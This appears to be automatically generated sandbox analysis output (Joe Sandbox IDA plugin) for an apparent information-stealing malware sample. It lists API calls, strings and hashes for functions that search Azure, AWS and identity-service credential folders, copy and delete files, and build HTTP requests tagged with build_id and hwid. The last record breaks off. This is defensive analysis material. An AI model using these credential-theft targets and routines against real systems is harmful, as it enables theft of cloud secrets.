------, xrefs: 00084F5B
------, xrefs: 00084DFB
", xrefs: 00084ED9
8w, xrefs: 00085222
------, xrefs: 00084C75
", xrefs: 00085039
build_id, xrefs: 0008500D

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
String ID: "$"$------$------$------$8w$build_id$hwid
API String ID: 3006978581-911962417
Opcode ID: 67f6366d172a262df49acf43d5de51ef9dc001d9fe11ef50bcd6aa9bf5932307
Instruction ID: 548915c7f0c779cc4c87cc4864d41b92a9a01480e12e193b6a4110ef8f5254cf
Opcode Fuzzy Hash: 67f6366d172a262df49acf43d5de51ef9dc001d9fe11ef50bcd6aa9bf5932307
Instruction Fuzzy Hash: 0B025A31D5512A9BCF21AB20DC46ADDB7B4FF44300F4580E1A998B7162DB74BE8A9FD0

Function 0009260C Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 204stringprocesssynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

_memset.LIBCMT ref: 000927B1
lstrcatA.KERNEL32(?,?,?,?,?), ref: 000927C3
lstrcatA.KERNEL32(?,000B6698), ref: 000927D5
lstrcatA.KERNEL32(?,2ee1445fc63bc20d0e7966867b13e0e1), ref: 000927E7
lstrcatA.KERNEL32(?,000B669C), ref: 000927F9
lstrcatA.KERNEL32(?,?), ref: 00092809
lstrcatA.KERNEL32(?,000B66A0), ref: 0009281B
lstrlenA.KERNEL32(?), ref: 00092824
lstrcatA.KERNEL32(?,EMPTY), ref: 00092840
lstrcatA.KERNEL32(?,000B66AC), ref: 00092852
lstrcatA.KERNEL32(?,?), ref: 00092862
lstrcatA.KERNEL32(?,000B66B0), ref: 00092874
lstrlenA.KERNEL32(?), ref: 00092881
_memset.LIBCMT ref: 000928B7

Part of subcall function 00090549: lstrlenA.KERNEL32(?,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 0009054F
Part of subcall function 00090549: lstrcpyA.KERNEL32(00000000,00000000,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 00090581

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00092446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00094A8D), ref: 00092460

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,000B66B4,?), ref: 00092924
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00092932

Strings

.exe, xrefs: 0009264F
2ee1445fc63bc20d0e7966867b13e0e1, xrefs: 000927DB
EMPTY, xrefs: 0009283A

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
String ID: .exe$2ee1445fc63bc20d0e7966867b13e0e1$EMPTY
API String ID: 141474312-498064747
Opcode ID: 97988bcf71f5e4345236cfbfcff4d6fa417182e76c77e2728b4fdd1b932b8c50
Instruction ID: 862110403d14d8bf0f33930fa429486a70e6f40925e8b69f9443c4b15c5f4313
Opcode Fuzzy Hash: 97988bcf71f5e4345236cfbfcff4d6fa417182e76c77e2728b4fdd1b932b8c50
Instruction Fuzzy Hash: 4981D7B2D40129ABCF11BF60EC86ADE77B8FB04304F4144A5B758B7162D734AE899F54

Function 000964BD Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 114stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 000964E2

Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD

lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00096501
lstrcatA.KERNEL32(?,\.azure\), ref: 0009651E

Part of subcall function 00095FD1: wsprintfA.USER32 ref: 00096018
Part of subcall function 00095FD1: FindFirstFileA.KERNEL32(?,?), ref: 0009602F
Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6AB4), ref: 00096050
Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6AB8), ref: 0009606A
Part of subcall function 00095FD1: wsprintfA.USER32 ref: 00096091
Part of subcall function 00095FD1: StrCmpCA.SHLWAPI(?,000B6647), ref: 000960A5
Part of subcall function 00095FD1: wsprintfA.USER32 ref: 000960C2
Part of subcall function 00095FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 000960EF
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?), ref: 00096125
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,000B6AD0), ref: 00096137
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,?), ref: 0009614A
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,000B6AD4), ref: 0009615C
Part of subcall function 00095FD1: lstrcatA.KERNEL32(?,?), ref: 00096170

_memset.LIBCMT ref: 00096556
lstrcatA.KERNEL32(?,00000000), ref: 00096578
lstrcatA.KERNEL32(?,\.aws\), ref: 00096595

Part of subcall function 00095FD1: wsprintfA.USER32 ref: 000960D9
Part of subcall function 00095FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00096229
Part of subcall function 00095FD1: DeleteFileA.KERNEL32(?), ref: 0009629D
Part of subcall function 00095FD1: FindNextFileA.KERNEL32(?,?), ref: 000962FF
Part of subcall function 00095FD1: FindClose.KERNEL32(?), ref: 00096313

_memset.LIBCMT ref: 000965CA
lstrcatA.KERNEL32(?,00000000), ref: 000965EC
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00096609
_memset.LIBCMT ref: 0009663E

Strings

\.azure\, xrefs: 00096512
msal.cache, xrefs: 0009661E
\.IdentityService\, xrefs: 000965FD
*.*, xrefs: 000965AA
Azure\.azure, xrefs: 00096531
*.*, xrefs: 00096536
\.aws\, xrefs: 00096589
Azure\.aws, xrefs: 000965A5
Azure\.IdentityService, xrefs: 00096619

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$File_memsetwsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 780282842-974132213
Opcode ID: d12ce8386464844102aefba75a3c994f33f28a3435c10d3678592805e12c08ef
Instruction ID: 0162f74c0e841c9ff32937d5613481629441f6f43e94e1e73f02b8b8c76935b2
Opcode Fuzzy Hash: d12ce8386464844102aefba75a3c994f33f28a3435c10d3678592805e12c08ef
Instruction Fuzzy Hash: 48418271D8021CAADF14FB60EC4BFDD737CAF09700F4404A6B614AB192EAB59A858F51

Function 0008ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00091C4A: GetSystemTime.KERNEL32(?,000B6701,?), ref: 00091C79

Part of subcall function 00090609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 0009061D
Part of subcall function 00090609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090645
Part of subcall function 00090609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0009709C,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 00090650

Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

Part of subcall function 0009058D: lstrcpyA.KERNEL32(00000000,?,00000000,000970BA,000B6C18,00000000,000B66CD,?,?,?,?,0009858F), ref: 000905BD

CopyFileA.KERNEL32(?,?,00000001), ref: 0008AC8A
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0008AD94
HeapAlloc.KERNEL32(00000000), ref: 0008AD9B
StrCmpCA.SHLWAPI(?,000B73DC,00000000), ref: 0008AE4C
StrCmpCA.SHLWAPI(?,000B73E0), ref: 0008AE74
lstrcatA.KERNEL32(00000000,?), ref: 0008AE98
lstrcatA.KERNEL32(00000000,000B73E4), ref: 0008AEA4
lstrcatA.KERNEL32(00000000,?), ref: 0008AEAE
lstrcatA.KERNEL32(00000000,000B73E8), ref: 0008AEBA
lstrcatA.KERNEL32(00000000,?), ref: 0008AEC4
lstrcatA.KERNEL32(00000000,000B73EC), ref: 0008AED0
lstrcatA.KERNEL32(00000000,?), ref: 0008AEDA
lstrcatA.KERNEL32(00000000,000B73F0), ref: 0008AEE6
lstrcatA.KERNEL32(00000000,?), ref: 0008AEF0
lstrcatA.KERNEL32(00000000,000B73F4), ref: 0008AEFC
lstrcatA.KERNEL32(00000000,?), ref: 0008AF06
lstrcatA.KERNEL32(00000000,000B73F8), ref: 0008AF12
lstrcatA.KERNEL32(00000000,?), ref: 0008AF1C
lstrcatA.KERNEL32(00000000,000B73FC), ref: 0008AF28
lstrlenA.KERNEL32(00000000), ref: 0008AF7A
lstrlenA.KERNEL32(?), ref: 0008AF95
DeleteFileA.KERNEL32(?), ref: 0008AFD8

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTime
String ID:
API String ID: 1139693110-0
Opcode ID: 14a33a18b185362ef6a2987de253dbc542c4e5a2a896accb23de58eaaa6c98e3
Instruction ID: ef2f7126b416a03656c24439b2a0cbcfaa932609fbc36e3094d8e087ff2570a4
Opcode Fuzzy Hash: 14a33a18b185362ef6a2987de253dbc542c4e5a2a896accb23de58eaaa6c98e3
Instruction Fuzzy Hash: 52C1E332D04109EFDF01BBA0EC4A9EE7BB4FF04700F514066F691BB062DB216E56AB91

Function 000939C2 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 127stringCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,block,?,?,00097744), ref: 000939D7
ExitProcess.KERNEL32 ref: 000939E2
strtok_s.MSVCRT ref: 000939F3

Strings

block, xrefs: 000939CB
Dw, xrefs: 000939EC, 000939EF

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: ExitProcessstrtok_s
String ID: Dw$block
API String ID: 3407564107-2407447776
Opcode ID: 1dc37ce4c6daf1b1ad7f9b2dd32ce6b935e14bf063ce8af6b0382940b9e80526
Instruction ID: a0668b14c39a8a948b7b6772cbaf5e037912495ac4f941314c3f304799ad7149
Opcode Fuzzy Hash: 1dc37ce4c6daf1b1ad7f9b2dd32ce6b935e14bf063ce8af6b0382940b9e80526
Instruction Fuzzy Hash: A0419FB0A40205BFDF506F70BC49FAB7BA8FB2474A7105266F616EA050FB34DA40AF51

Function 0009B870 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,759183C0,00000000,0009C55B,?), ref: 0009B875
StrCmpCA.SHLWAPI(759183C0,000B613C), ref: 0009B8A3
StrCmpCA.SHLWAPI(759183C0,.zip), ref: 0009B8B3
StrCmpCA.SHLWAPI(759183C0,.zoo), ref: 0009B8BF
StrCmpCA.SHLWAPI(759183C0,.arc), ref: 0009B8CB
StrCmpCA.SHLWAPI(759183C0,.lzh), ref: 0009B8D7
StrCmpCA.SHLWAPI(759183C0,.arj), ref: 0009B8E3
StrCmpCA.SHLWAPI(759183C0,.gz), ref: 0009B8EF
StrCmpCA.SHLWAPI(759183C0,.tgz), ref: 0009B8FB

Strings

.arc, xrefs: 0009B8C5
.zip, xrefs: 0009B8AD
.lzh, xrefs: 0009B8D1
.tgz, xrefs: 0009B8F5
.zoo, xrefs: 0009B8B9
.arj, xrefs: 0009B8DD
.gz, xrefs: 0009B8E9

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 1659193697-51310709
Opcode ID: 86b2195adcd8c148ec724a313ec512bb19c3104a3d0a324bd369cf79290d2001
Instruction ID: c0d5a449e403b1d9a4aee25722f427cfa5c562a1dd95351f88fce8b0330e8a9c
Opcode Fuzzy Hash: 86b2195adcd8c148ec724a313ec512bb19c3104a3d0a324bd369cf79290d2001
Instruction Fuzzy Hash: 4F017524B94726756E712631AF85EBF3EDC4F8AFA07080426E901A5088DF5D9913F5B1

Function 000935A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 000935EA
StrCmpCA.SHLWAPI(?,true), ref: 000936AC

Part of subcall function 00090549: lstrlenA.KERNEL32(?,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 0009054F
Part of subcall function 00090549: lstrcpyA.KERNEL32(00000000,00000000,?,00097174,000B66CF,000B66CE,?,?,?,?,0009858F), ref: 00090581

lstrcpyA.KERNEL32(?,?), ref: 0009376E
lstrcpyA.KERNEL32(?,00000000), ref: 0009379F
lstrcpyA.KERNEL32(?,00000000), ref: 000937DB
lstrcpyA.KERNEL32(?,00000000), ref: 00093817
lstrcpyA.KERNEL32(?,00000000), ref: 00093853
lstrcpyA.KERNEL32(?,00000000), ref: 0009388F
lstrcpyA.KERNEL32(?,00000000), ref: 000938CB
strtok_s.MSVCRT ref: 0009398F

Strings

false, xrefs: 000936C5
true, xrefs: 000936A6

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcpy$strtok_s$lstrlen
String ID: false$true
API String ID: 2116072422-2658103896
Opcode ID: 82019c1e39bd8a8fc46ff597a5d9656a8975ba9034d8f3f1ee0039cf035797f1
Instruction ID: 8beff99d12dae5187fa18fc7f74b3c7aa4cbb9ecaf76f962084e9d006e118b76
